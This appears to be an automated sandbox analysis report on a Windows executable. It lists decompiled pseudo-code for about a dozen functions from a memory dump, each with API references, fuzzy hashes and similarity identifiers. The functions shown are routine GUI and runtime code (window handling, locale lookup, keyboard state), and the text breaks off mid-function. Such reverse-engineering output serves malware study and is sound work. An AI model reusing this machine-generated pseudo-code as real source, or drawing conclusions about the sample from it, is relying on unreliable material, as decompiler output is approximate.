Opcode Fuzzy Hash: 6459d9a12d5297b45977446b9e8359c2b755e30534f2d9c0bcc8ae5443016906
Instruction Fuzzy Hash: 31B17175A00504AFDB15DF69C986BAEB3F5FF89304F6544A6E404A7361CB38EE42CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0044AD10, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044AD10(void* __eax) {
				struct HWND__* _t21;
				void* _t40;

				_t40 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 == 0) {
					E0044A3FC();
					SetActiveWindow( *(_t40 + 0x30));
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043260C( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t21 = E00449D18( *(_t40 + 0x30), 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						SetWindowPos( *(_t40 + 0x30), E0043260C( *((intOrPtr*)(_t40 + 0x44))),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t21 =  *(_t40 + 0x30);
						_push(_t21);
						L0040668C();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}

0x0044ad12
0x0044ad18
0x0044ad1f
0x0044ad27
0x0044ad30
0x0044ad39
0x0044ada0
0x0044ad5c
0x0044ad60
0x0044ad7c
0x0044ad81
0x0044ad83
0x0044ad88
0x0044ad8d
0x0044ad90
0x0044ad91
0x0044ad91
0x0044adad
0x00000000
0x0044adb7
0x0044adad
0x0044adbf

APIs

IsIconic.USER32(?), ref: 0044AD18
SetActiveWindow.USER32(?,?,?,?,0044A7E0,00000000,0044ACAB), ref: 0044AD30
IsWindowEnabled.USER32(00000000), ref: 0044AD53
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?,0044A7E0,00000000,0044ACAB), ref: 0044AD7C
NtdllDefWindowProc_A.NTDLL(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?), ref: 0044AD91

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledIconicNtdllProc_
String ID:
API String ID: 1720852555-0
Opcode ID: 0eca10fc3f428fe2998653f0bb1c6eee74dd09e2e655326bc20792251aa65e67
Instruction ID: 279815cf48fb19b71404bbf2f0b8d17b494547346c88d226d4452da013fcf281
Opcode Fuzzy Hash: 0eca10fc3f428fe2998653f0bb1c6eee74dd09e2e655326bc20792251aa65e67
Instruction Fuzzy Hash: DC113DB1A402009BEB54EF69C9C6B9B37EDAF08705F08407ABA05DF687D679EC508719

Uniqueness

Uniqueness Score: -1.00%

Function 004225DC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004225DC(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x47b939 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0042254C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x47b914; // 0x4225dc
				 *0x47b914 = E004223DC(1, _t19, _t21, __edi, _t23);
				return  *0x47b914(_t23, _t19);
			}

0x004225e4
0x004225e7
0x004225f1
0x0042261b
0x0042262c
0x0042263f
0x0042262e
0x00422633
0x00422633
0x00000000
0x00422649
0x00000000
0x0042261d
0x004225f8
0x00422605
0x00000000

Strings

MonitorFromWindow, xrefs: 004225F3

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 27099281e275f9ea460658787de925e9ba509c89e33b1505458c0b9d1a056b88
Instruction ID: e37eb7e393eb9111e67360654c60f863db6b3fe4dba68253bb8b427315ac9a47
Opcode Fuzzy Hash: 27099281e275f9ea460658787de925e9ba509c89e33b1505458c0b9d1a056b88
Instruction Fuzzy Hash: 56018FB36014287A8710EB50AE81ABB735CDB04304F804027EA15A3351EB7C9A4196BE

Uniqueness

Uniqueness Score: -1.00%

Function 00426D88, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00426D88(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x426e05);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E004267E8(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E004263E8(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004046A0(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x426e0c);
				return E004041E0( &_v8);
			}

0x00426d8b
0x00426d8f
0x00426d93
0x00426d94
0x00426d99
0x00426d9c
0x00426da1
0x00426dab
0x00426dad
0x00426daf
0x00426dbb
0x00426dc9
0x00426dd2
0x00426ddb
0x00426dea
0x00426dea
0x00426df1
0x00426df4
0x00426df7
0x00426e04

APIs

Part of subcall function 004267E8: WinHelpA.USER32(00000000,00426800,00000002,00000000), ref: 004267F7

GetTickCount.KERNEL32 ref: 00426DA6
Sleep.KERNEL32(00000000,00000000,00426E05,?,?,00000000,00000000,?,00426D7E), ref: 00426DAF
GetTickCount.KERNEL32 ref: 00426DB4
WinHelpA.USER32(00000000,?,?,00000000), ref: 00426DEA

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: c97aa1d2d3793cb56c9e3c6d6bfd4bc97232377be7dc8d7aa85d2a5222bede55
Instruction ID: 6008f164493540e6f299179210a59a34b654a0230ab4380f61dad19cb1738b9d
Opcode Fuzzy Hash: c97aa1d2d3793cb56c9e3c6d6bfd4bc97232377be7dc8d7aa85d2a5222bede55
Instruction Fuzzy Hash: 0101A234700214AFE711EBA6EC42B5DB3A8DB48704F934477F901E65C1DA7DAE10C5AD

Uniqueness

Uniqueness Score: -1.00%

Function 00430020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00430020(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0042C680(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E0042D190(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0042FF8C(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043286C(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0043260C(_t50);
						_push(_t32);
						L0040668C();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E0042D190(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00406B50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0042BA9C(_t50,  &_v28,  &_v20);
					_t21 = E0042FEF8(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E00442640(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043260C(__eax);
						if(_t45 == GetCapture() &&  *0x479a1c != 0) {
							_t47 =  *0x479a1c; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x479a1c; // 0x0
								E0042D0C4(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x00430026
0x00430028
0x0043002a
0x0043002c
0x00430031
0x00430050
0x00430053
0x00430130
0x00430137
0x00430182
0x00430182
0x00430182
0x00430173
0x00000000
0x00430177
0x00430061
0x004300fa
0x00430101
0x00000000
0x00000000
0x00430107
0x00000000
0x00000000
0x0043010b
0x00430112
0x00000000
0x00000000
0x00430117
0x0043011b
0x0043011e
0x00430121
0x00430126
0x00430127
0x00000000
0x00430127
0x00000000
0x00430067
0x00430033
0x004300a9
0x004300b2
0x00000000
0x00000000
0x004300c1
0x004300d0
0x004300dd
0x004300e4
0x00000000
0x00000000
0x004300ea
0x00000000
0x004300ea
0x00430035
0x00430038
0x00430073
0x00430077
0x00000000
0x00000000
0x00430083
0x0043008b
0x00000000
0x00000000
0x00000000
0x00430091
0x0043003a
0x0043003b
0x0043009a
0x00000000
0x00000000
0x0043003d
0x00430040
0x0043013d
0x0043014b
0x00430156
0x0043015e
0x00430169
0x0043016e
0x0043016e
0x0043015e
0x0043014b
0x00430040

APIs

GetCapture.USER32 ref: 00430144

Strings

, xrefs: 00430096

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 28b772b7c94a9ffad3aed440cc9edf5125aed0e0bb486a145a6d403cccd4ba19
Instruction ID: 08e18ff472c6808cd64e93f6a064a4dcd5a101cec19396b2a439a1af65842da3
Opcode Fuzzy Hash: 28b772b7c94a9ffad3aed440cc9edf5125aed0e0bb486a145a6d403cccd4ba19
Instruction Fuzzy Hash: 44318B317042008ACF20AA3DDDA572B23A59B4D798F14AB3FB456C77A6DA7ECC05874D

Uniqueness

Uniqueness Score: -1.00%

Function 00449B50, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449B50() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x47bbac = GetCurrentThreadId();
				L5:
				_t5 =  *0x47bbb0; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x47bb9c != 0 &&  *((intOrPtr*)( *0x47bb9c + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E0042A7D0( &_v12) == 0) {
							E0044BF10( *0x47bb9c);
						}
					}
					goto L5;
				}
				return _t6;
			}

0x00449b61
0x00449b91
0x00449b93
0x00449b99
0x00449ba3
0x00449b6b
0x00449b79
0x00449b88
0x00449b8c
0x00449b8c
0x00449b88
0x00000000
0x00449b6b
0x00449ba9

APIs

GetCurrentThreadId.KERNEL32 ref: 00449B5C
GetCursorPos.USER32(?), ref: 00449B79
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00449B99

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: fbd48d564630ff88040c50a53cc3b70d2c881fad5de13e02d1dccfef96a1bc1c
Instruction ID: ac8770946664f0f2c4c483187e4a39fd1f1edb108847f5d51ab2bd235b597f84
Opcode Fuzzy Hash: fbd48d564630ff88040c50a53cc3b70d2c881fad5de13e02d1dccfef96a1bc1c
Instruction Fuzzy Hash: 31F05E315042589BEB10A769E886F9B33E8FB00314F40057BE945963D6E77DBC90EA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00431744, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431744(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E00431694(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x479fc4; // 0x47bb9c
					_t9 =  *_t31 + 0x44; // 0x0
					if(_t37 ==  *_t9) {
						goto L8;
					} else {
						_t34 = E00442640(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E0042D0C4(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}

0x0043174a
0x0043174d
0x0043175f
0x004317bd
0x004317cd
0x004317dc
0x00000000
0x004317e3
0x004317d2
0x004317da
0x00000000
0x00000000
0x0043178e
0x0043178e
0x00431795
0x00431798
0x00000000
0x0043179a
0x0043179c
0x004317a1
0x004317a5
0x00000000
0x004317a7
0x004317b4
0x004317bb
0x00000000
0x00000000
0x004317bb
0x004317a5
0x00431798
0x004317ea

APIs

IsIconic.USER32(?), ref: 0043177C
GetCapture.USER32 ref: 00431785

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: b2bd328e6ebfd9cb1cfac71af7c40fec09df9bfb1a48928ba1c26282719cb5a1
Instruction ID: 457b6533c217cfc343be275666b0f6fd441750a79479a3058dcbfa19efa5b80e
Opcode Fuzzy Hash: b2bd328e6ebfd9cb1cfac71af7c40fec09df9bfb1a48928ba1c26282719cb5a1
Instruction Fuzzy Hash: C31173367002059FDB24DB69C9C5D6AB3E4EF08308F2991BAF404DB362DB38ED409758

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA04, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041DA04(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x41daa0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E0041D9B0(_t22);
				} else {
					E00404450( &_v264, 0x100,  &_v260);
					E0040B61C(_v264, 1);
					E00403BF4();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x41daa7);
				return E004041E0( &_v264);
			}

0x0041da10
0x0041da18
0x0041da19
0x0041da1e
0x0041da21
0x0041da29
0x0041da2d
0x0041da82
0x0041da53
0x0041da64
0x0041da76
0x0041da7b
0x0041da7b
0x0041da89
0x0041da8c
0x0041da8f
0x0041da9f

APIs

GetLastError.KERNEL32(00000000,0041DAA0), ref: 0041DA24
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041DAA0), ref: 0041DA4A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 66041053bbf2fec2a14a93a6bca3f66650a98c78e2c577603e60cb175c4fc77c
Instruction ID: cfef060e376b0b539c22b8213791ab266f963d2b0d5b9ca5f5d70c8cedac1601
Opcode Fuzzy Hash: 66041053bbf2fec2a14a93a6bca3f66650a98c78e2c577603e60cb175c4fc77c
Instruction Fuzzy Hash: 5101D8B06442045BD711EB618C82BD677A8DF48744F5100BAF604A66C1DAF86E80491C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C424, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040C424(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40c488);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404450( &_v16, 7,  &_v11);
				_push(_v16);
				E00408140(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040C48F);
				return E004041E0( &_v16);
			}

0x0040c424
0x0040c42d
0x0040c432
0x0040c433
0x0040c438
0x0040c43b
0x0040c44a
0x0040c45a
0x0040c462
0x0040c46b
0x0040c474
0x0040c477
0x0040c47a
0x0040c487

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040C488), ref: 0040C44A
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040C488), ref: 0040C463

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 99b10af4630ade1655d30ce88598a124e794e9924484ede18413a626b89adaf2
Instruction ID: 7080b606e37789b5d795a18867263ace17f01e512d406138876df6bafd48d411
Opcode Fuzzy Hash: 99b10af4630ade1655d30ce88598a124e794e9924484ede18413a626b89adaf2
Instruction Fuzzy Hash: 97F09675E04204ABEB00EFF2DC5299EB3AAEBC8718F50C57AB610A65C1EA7C66048654

Uniqueness

Uniqueness Score: -1.00%

Function 0042D190, Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042D190(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0042BAF8(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x479fc4; // 0x47bb9c
								E0044BD84( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403674(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x47bafc; // 0x23212e4
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x47bafc; // 0x23212e4
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x47bafc; // 0x23212e4
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00442584( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403674(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E00442640(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E00442640(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}

0x0042d19c
0x0042d19e
0x0042d1a4
0x0042d1dc
0x0042d1dc
0x0042d1e3
0x0042d21c
0x0042d21e
0x0042d223
0x0042d2fb
0x0042d2fb
0x0042d300
0x0042d30d
0x0042d30d
0x0042d312
0x00000000
0x0042d318
0x0042d229
0x0042d22e
0x00000000
0x00000000
0x0042d234
0x0042d238
0x0042d24e
0x0042d250
0x0042d250
0x0042d255
0x0042d262
0x0042d264
0x0042d26d
0x00000000
0x0042d26d
0x0042d257
0x0042d257
0x0042d258
0x0042d277
0x0042d277
0x0042d27b
0x0042d28d
0x00000000
0x0042d28d
0x00000000
0x0042d283
0x0042d25a
0x0042d25a
0x0042d25b
0x0042d294
0x00000000
0x0042d294
0x0042d25d
0x0042d25e
0x00000000
0x00000000
0x0042d29b
0x0042d2a0
0x0042d2a4
0x00000000
0x0042d2a6
0x0042d2a6
0x0042d2ab
0x0042d2af
0x00000000
0x00000000
0x0042d2b3
0x0042d2b9
0x0042d2b9
0x0042d2bc
0x00000000
0x00000000
0x0042d2c5
0x0042d2cc
0x0042d2da
0x0042d2e1
0x0042d2e8
0x00000000
0x0042d2f4
0x00000000
0x0042d2a4
0x0042d23a
0x0042d23a
0x0042d23f
0x0042d24b
0x0042d24b
0x0042d24b
0x00000000
0x0042d24b
0x0042d241
0x0042d241
0x0042d244
0x00000000
0x00000000
0x0042d246
0x0042d249
0x00000000
0x00000000
0x00000000
0x0042d249
0x0042d1f3
0x0042d1fa
0x00000000
0x00000000
0x0042d209
0x0042d211
0x00000000
0x0042d217
0x0042d1a6
0x0042d1ad
0x0042d1b4
0x00000000
0x0042d1c2
0x0042d1d1
0x0042d1d6
0x00000000
0x00000000
0x0042d1d6
0x0042d1b4
0x0042d321

APIs

GetKeyboardState.USER32(?), ref: 0042D2C5

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: KeyboardState
String ID:
API String ID: 1724228437-0
Opcode ID: e574633e99aa44e0701874bae464a37635a291eafc19d154c9a4a219d7b653de
Instruction ID: 2cdf1bf811ec38d7ff0aa50b9897839957e999b7af78596d65e4e16ec0134887
Opcode Fuzzy Hash: e574633e99aa44e0701874bae464a37635a291eafc19d154c9a4a219d7b653de
Instruction Fuzzy Hash: 1A41B034B00625CBDB24DF19E5887AAB7A0BB0A304F9484A6D845D7391C778DD41CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004085C0, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004085C0(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _v32;
				CHAR* _t28;
				int _t35;
				intOrPtr _t40;
				intOrPtr _t43;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr _t51;
				intOrPtr _t53;

				_t28 = _a4;
				if(_t28 == 0) {
					_v32 = 0;
				} else {
					_v32 = _t28;
				}
